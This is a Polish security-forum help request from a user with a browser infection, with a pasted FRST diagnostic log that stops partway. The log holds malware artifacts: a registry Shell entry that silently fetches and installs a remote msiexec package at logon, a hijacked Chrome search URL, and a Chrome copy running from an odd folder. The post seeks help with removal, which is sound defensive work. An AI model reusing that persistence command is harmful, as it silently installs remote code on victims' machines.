• Ogłoszenie:

"infekcja" przeglądarek - proszę o pomoc.

Bezpieczeństwo systemów, usuwanie wirusów, dobieranie programów antywirusowych. Obowiązkowe logi w tym dziale: trzy z FRST + Gmer.

"infekcja" przeglądarek - proszę o pomoc.

Postprzez apollo2 22 Kwi 2017, 22:34

reklama
Jak w temacie złapałem jakieś świństwo prawdopodobnie w czasie oglądania streamu z meczu. I avast co jakiś czas wypluwa mi informacje że zostało wykryte zagrożenie Obiekty URL: MAL i jakies dziwne linki typu http://point.lbycbyc.com itp, i jeszcze jeden http://u76wtn6.x6.incapdns.net itp Poza problemem z chromem gdzie nie wyświetla mi wp ( błąd typu kurza twarz) nic się strasznego nie dzieje ale chcialbym się tego dziadostwa jakoś pozbyć. Zrobilem skan frstem
frst.txt
Kod: Zaznacz wszystko
Rezultaty skanowania Farbar Recovery Scan Tool (FRST) (x64) Wersja: 22-04-2017 01
Uruchomiony przez Adam (administrator)  KUTYLA (22-04-2017 22:12:52)
Uruchomiony z F:\wiro
Załadowane profile: Adam (Dostępne profile: Adam & Administrator)
Platform: Windows 8.1 (Update) (X64) Język: Polski (Polska)
Internet Explorer Wersja 11 (Domyślna przeglądarka: Chrome)
Tryb startu: Normal
Instrukcja obsługi Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Procesy (filtrowane) =================

(Załączenie wejścia w fixlist spowoduje zamknięcie procesu. Powiązany plik nie zostanie przeniesiony.)

(AMD) C:\Windows\System32\atiesrxx.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
() C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe
(Dropbox, Inc.) C:\Windows\System32\DbxSvc.exe
(CHENGDU YIWO Tech Development Co., Ltd) C:\Program Files (x86)\EaseUS\Todo Backup\bin\Agent.exe
(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
() C:\Program Files\Intel\Intel(R) Smart Connect Technology Agent\iSCTAgent.exe
(MICRO-STAR INTERNATIONAL CO., LTD.) C:\Program Files (x86)\MSI\MSITrigger\MSI_Trigger_Service.exe
(Filseclab Corporation Limited) C:\Program Files (x86)\ScreenShot\SSSvc.exe
(StarWind Software) C:\Program Files (x86)\Alcohol Soft\Alcohol 120\StarWind\StarWindServiceAE.exe
(AVG Technologies) C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesService64.exe
(AVAST Software s.r.o.) C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe
(Microsoft Corporation) C:\Windows\System32\vds.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.3\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.3\GoogleCrashHandler64.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(AMD) C:\Windows\System32\atieclxx.exe
(AVG Technologies) C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesApp64.exe
(Microsoft Corporation) C:\Windows\System32\SkyDrive.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Smart Connect Technology Agent\iSCTsysTray8.exe
(Akamai Inc.) C:\Users\Adam\AppData\Roaming\Octoshape\Octoshape Streaming Services\InfiniteMediaAcceleration.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastUI.exe
(Charity Engine) C:\Program Files (x86)\BOINC\boinctray.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
(Google Inc.) C:\Program Files (x86)\Eastness\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Eastness\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Eastness\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Eastness\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Eastness\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Eastness\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Eastness\Application\chrome.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
(Irfan Skiljan) C:\Program Files (x86)\IrfanView\i_view32.exe
(Irfan Skiljan) C:\Program Files (x86)\IrfanView\i_view32.exe
(Irfan Skiljan) C:\Program Files (x86)\IrfanView\i_view32.exe
(Google Inc.) C:\Program Files (x86)\Eastness\Application\chrome.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastUI.exe
(Google Inc.) C:\Program Files (x86)\Eastness\Application\chrome.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\livecomm.exe
(Google Inc.) C:\Program Files (x86)\Eastness\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Eastness\Application\chrome.exe

==================== Rejestr (filtrowane) ====================

(Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci. Powiązany plik nie zostanie przeniesiony.)

HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [287592 2013-08-07] (Intel Corporation)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [7637208 2014-07-15] (Realtek Semiconductor)
HKLM\...\Run: [ISCT Tray] => C:\Program Files\Intel\Intel(R) Smart Connect Technology Agent\iSCTsysTray8.exe [5860656 2014-08-25] (Intel Corporation)
HKLM\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvLaunch.exe [213824 2017-04-04] (AVAST Software)
HKLM-x32\...\Run: [GrooveMonitor] => C:\Program Files (x86)\Microsoft Office\Office12\GrooveMonitor.exe [31016 2006-10-27] (Microsoft Corporation)
HKLM-x32\...\Run: [Device Detector] => C:\Program Files (x86)\Common Files\ACD Systems\EN\DevDetect.exe [217088 2003-11-26] (ACD Systems, Ltd.)
HKLM-x32\...\Run: [Raptr] => C:\Program Files (x86)\Raptr\raptrstub.exe [56080 2015-11-20] (Raptr, Inc)
HKLM-x32\...\Run: [EaseUS EPM tray] => C:\Program Files (x86)\EaseUS\EaseUS Partition Master 10.2\bin\EpmNews.exe [2089056 2014-11-18] (CHENGDU YIWO Tech Development Co., Ltd)
HKLM-x32\...\Run: [Smart File Advisor] => C:\Program Files (x86)\Smart File Advisor\sfa.exe [282384 2015-03-22] (Filefacts.net)
HKLM-x32\...\Run: [boinctray] => C:\Program Files (x86)\BOINC\boinctray.exe [71312 2014-03-07] (Charity Engine)
HKLM-x32\...\Run: [boincmgr] => C:\Program Files (x86)\BOINC\charityengine.exe [3757712 2014-03-07] (Charity Engine)
HKLM-x32\...\Run: [Dropbox] => C:\Program Files (x86)\Dropbox\Client\Dropbox.exe [28344776 2017-04-17] (Dropbox, Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2016-12-12] (Oracle Corporation)
Winlogon\Notify\igfxcui: igfxdev.dll [X]
HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\Run: [GG] => C:\Users\Adam\AppData\Local\GG\Application\gghub.exe [4078144 2015-04-10] (GG Network S.A.)
HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\Run: [Tlen.pl] => F:\Tlen7\tlen7.exe [82432 2011-04-11] ()
HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [7416088 2015-02-19] (Piriform Ltd)
HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\Run: [DAEMON Tools Lite] => C:\Program Files\DAEMON Tools Lite\DTLite.exe [5585136 2015-03-31] (Disc Soft Ltd)
HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\Run: [AlcoholAutomount] => C:\Program Files (x86)\Alcohol Soft\Alcohol 120\AxAutoMntSrv.exe [39376 2015-03-12] (Alcohol Soft Development Team)
HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\Run: [AceStream] => C:\Users\Adam\AppData\Roaming\ACEStream\engine\ace_engine.exe
HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\Run: [IPLA!] => C:\Program Files (x86)\ipla\ipla.exe [21032736 2016-07-11] (Cyfrowy Polsat S.A.)
HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\Run: [Octoshape Streaming Services] => C:\Users\Adam\AppData\Roaming\Octoshape\Octoshape Streaming Services\InfiniteMediaAcceleration.exe [267048 2016-10-13] (Akamai Inc.)
HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj81MdkcFTJYOTNYRWY1MTE5FjQSMWZXOUNLOTFyOWVWFF== /q
HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\MountPoints2: {ef3b16a7-e760-11e4-82b3-d8cb8a1d695b} - "E:\setup.exe"
HKU\S-1-5-21-1070030570-2694662635-206350218-1001\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\system32\Bubbles.scr [788480 2014-10-29] (Microsoft Corporation)
IFEO\taskmgr.exe: [Debugger]
ShellIconOverlayIdentifiers: [   DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-04-17] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-04-17] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-04-17] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-04-17] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-04-17] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-04-17] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-04-17] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-04-17] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-04-17] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-04-17] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [  GoogleDriveBlacklisted] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2017-03-21] (Google)
ShellIconOverlayIdentifiers: [  GoogleDriveSynced] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D40} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2017-03-21] (Google)
ShellIconOverlayIdentifiers: [  GoogleDriveSyncing] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2017-03-21] (Google)
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2017-04-04] (AVAST Software)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2017-04-04] (AVAST Software)
ShellIconOverlayIdentifiers-x32: [   DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-04-17] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-04-17] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-04-17] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-04-17] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-04-17] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-04-17] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-04-17] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-04-17] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-04-17] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-04-17] (Dropbox, Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk [2015-09-28]
ShortcutTarget: McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.11.163\SSScheduler.exe (McAfee, Inc.)
GroupPolicy: Ograniczenia - Chrome <======= UWAGA

==================== Internet (filtrowane) ====================

(Załączenie wejścia w fixlist, w przypadku gdy jest to obiekt rejestru, spowoduje usunięcie go z rejestru lub przywrócenie jego domyślnej postaci.)

Hosts: 0.0.0.1   mssplus.mcafee.com
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{97873D01-DB11-4BD3-B41E-FEDF993D4E26}: [NameServer] 8.8.8.8,8.8.4.4,4.2.2.1,4.2.2.2,208.67.222.222,208.67.220.220,8.26.56.26,8.20.247.20,156.154.70.1,156.154.71.1
Tcpip\..\Interfaces\{FFDF1842-EE36-418F-8951-CD09355D40D6}: [DhcpNameServer] 192.168.0.1

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKU\S-1-5-21-1070030570-2694662635-206350218-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://www.google.com/search?bcutc=sp-006&q={searchTerms}
HKU\S-1-5-21-1070030570-2694662635-206350218-1001\Software\Microsoft\Internet Explorer\Main,Start Page =
HKU\S-1-5-21-1070030570-2694662635-206350218-1001\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/pl-pl/?ocid=iehp
SearchScopes: HKLM-x32 -> {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = hxxps://www.google.com/search?bcutc=sp-006&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1070030570-2694662635-206350218-1001 -> {23594953-016F-416E-98D1-75C17FE5C866} URL = hxxps://search.yahoo.com/search?fr=mcafee&type=B011PL0D20150226&p={searchTerms}
SearchScopes: HKU\S-1-5-21-1070030570-2694662635-206350218-1001 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = hxxp://www.google.com/search?q={sear
SearchScopes: HKU\S-1-5-21-1070030570-2694662635-206350218-1001 -> {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = hxxps://www.google.com/search?bcutc=sp-006&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1070030570-2694662635-206350218-1001 -> {szukaj.gazeta.pl} URL = hxxp://szukaj.gazeta.pl/internet/0,0.html?slowo={searchTerms}
BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll [2017-04-04] (AVAST Software)
BHO: Brak nazwy -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> Brak pliku
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll [2006-10-27] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_121\bin\ssv.dll [2017-04-12] (Oracle Corporation)
BHO-x32: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2017-04-04] (AVAST Software)
BHO-x32: Brak nazwy -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> Brak pliku
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_121\bin\jp2ssv.dll [2017-04-12] (Oracle Corporation)
Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} -  Brak pliku
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} -  Brak pliku
Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} -  Brak pliku

FireFox:
========
FF DefaultProfile: ti2j30g5.default
FF ProfilePath: C:\Users\Adam\AppData\Roaming\Mozilla\Firefox\Profiles\ti2j30g5.default [2017-04-21]
FF user.js: detected! => C:\Users\Adam\AppData\Roaming\Mozilla\Firefox\Profiles\ti2j30g5.default\user.js [2017-04-21]
FF DefaultSearchEngine: Mozilla\Firefox\Profiles\ti2j30g5.default -> luck
FF DefaultSearchUrl: Mozilla\Firefox\Profiles\ti2j30g5.default -> hxxps://www.google.com/search?bcutc=sp-006
FF SearchEngineOrder.1: Mozilla\Firefox\Profiles\ti2j30g5.default -> luck
FF SelectedSearchEngine: Mozilla\Firefox\Profiles\ti2j30g5.default -> luck
FF Keyword.URL: Mozilla\Firefox\Profiles\ti2j30g5.default -> hxxps://www.google.com/search?bcutc=sp-006
FF SearchPlugin: C:\Users\Adam\AppData\Roaming\Mozilla\Firefox\Profiles\ti2j30g5.default\searchplugins\google-avast.xml [2017-04-12]
FF HKLM\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF Extension: (Avast Online Security) - C:\Program Files\AVAST Software\Avast\WebRep\FF [2016-09-26]
FF HKLM\...\Firefox\Extensions: [sp@avast.com] - C:\Program Files\AVAST Software\Avast\SafePrice\FF
FF Extension: (Avast SafePrice) - C:\Program Files\AVAST Software\Avast\SafePrice\FF [2016-09-26]
FF HKLM-x32\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor => nie znaleziono
FF HKLM-x32\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF HKLM-x32\...\Firefox\Extensions: [sp@avast.com] - C:\Program Files\AVAST Software\Avast\SafePrice\FF
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_25_0_0_148.dll [2017-04-11] ()
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.40416.0\npctrl.dll [2015-04-16] ( Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=2.2.0 -> F:\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin: @videolan.org/vlc,version=2.2.1 -> F:\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin: @videolan.org/vlc,version=2.2.4 -> F:\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_25_0_0_148.dll [2017-04-11] ()
FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll [2015-10-13] (Google, Inc.)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2014-09-03] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.56 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2014-09-03] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2014-09-03] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.121.2 -> C:\Program Files (x86)\Java\jre1.8.0_121\bin\dtplugin\npDeployJava1.dll [2017-04-12] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.121.2 -> C:\Program Files (x86)\Java\jre1.8.0_121\bin\plugin2\npjp2.dll [2017-04-12] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.40416.0\npctrl.dll [2015-04-15] ( Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.3\npGoogleUpdate3.dll [2017-04-11] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.3\npGoogleUpdate3.dll [2017-04-11] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2017-04-05] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-1070030570-2694662635-206350218-1001: @acestream.net/acestreamplugin,version=3.1.6 -> C:\Users\Adam\AppData\Roaming\ACEStream\player\npace_plugin.dll [Brak pliku]
FF Plugin HKU\S-1-5-21-1070030570-2694662635-206350218-1001: @octoshape.com/Octoshape Streaming Services,version=1.0 -> C:\Users\Adam\AppData\Roaming\Octoshape\Octoshape Streaming Services\sua-1702150-0-npoctoshape.dll [2017-02-15] (Octoshape ApS)
FF Plugin ProgramFiles/Appdata: C:\Users\Adam\AppData\Roaming\mozilla\plugins\npoctoshape.dll [2017-03-23] (Octoshape ApS)

Chrome:
=======
CHR DefaultProfile: Default
CHR HomePage: Default -> hxxps://www.google.com/
CHR DefaultSearchURL: Default -> hxxp://www.ourluckysites.com/search/?type=ds&ts=1492586333&z=992be6b061a858d166d62d5g6z4tao4wdb1q6c0ccc&from=che0812&uid=ST1000DM003-1ER162_Z4Y42GHSXXXXZ4Y42GHS&q={searchTerms}
CHR DefaultSearchKeyword: Default -> ourluckysites
CHR Profile: C:\Users\Adam\AppData\Local\Google\Chrome\User Data\Default [2017-04-21]
CHR Extension: (Prezentacje Google) - C:\Users\Adam\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-02-27]
CHR Extension: (Dokumenty Google) - C:\Users\Adam\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-02-27]
CHR Extension: (Dysk Google) - C:\Users\Adam\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-10-21]
CHR Extension: (YouTube) - C:\Users\Adam\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-25]
CHR Extension: (Google Search) - C:\Users\Adam\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-27]
CHR Extension: (Adobe Acrobat) - C:\Users\Adam\AppData\Local\Google\Chrome\User Data\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2017-03-05]
CHR Extension: (Avast SafePrice) - C:\Users\Adam\AppData\Local\Google\Chrome\User Data\Default\Extensions\eofcbnmajmjmplflapaojjnihcjkigck [2017-03-17]
CHR Extension: (Arkusze Google) - C:\Users\Adam\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-02-27]
CHR Extension: (McAfee® WebAdvisor) - C:\Users\Adam\AppData\Local\Google\Chrome\User Data\Default\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2017-03-21]
CHR Extension: (Dokumenty Google offline) - C:\Users\Adam\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-04-03]
CHR Extension: (ModHeader) - C:\Users\Adam\AppData\Local\Google\Chrome\User Data\Default\Extensions\idgpnmonknjnojddfkpgkljpfnnfcklj [2017-02-24]
CHR Extension: (User-Agent Switcher) - C:\Users\Adam\AppData\Local\Google\Chrome\User Data\Default\Extensions\lkmofgnohbedopheiphabfhfjgkhfcgf [2015-02-27]
CHR Extension: (Ace Stream Web Extension) - C:\Users\Adam\AppData\Local\Google\Chrome\User Data\Default\Extensions\mjbepbhonbojpoaenhckjocchgfiaofo [2016-08-08]
CHR Extension: (Płatności w sklepie Chrome Web Store) - C:\Users\Adam\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-03-09]
CHR Extension: (Gmail) - C:\Users\Adam\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-03-29]
CHR Extension: (Chrome Media Router) - C:\Users\Adam\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-04-04]
CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx <nie znaleziono>
CHR HKU\S-1-5-21-1070030570-2694662635-206350218-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [mjbepbhonbojpoaenhckjocchgfiaofo] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChromeSp.crx <nie znaleziono>
CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx <nie znaleziono>
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx <nie znaleziono>

==================== Usługi (filtrowane) ====================

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

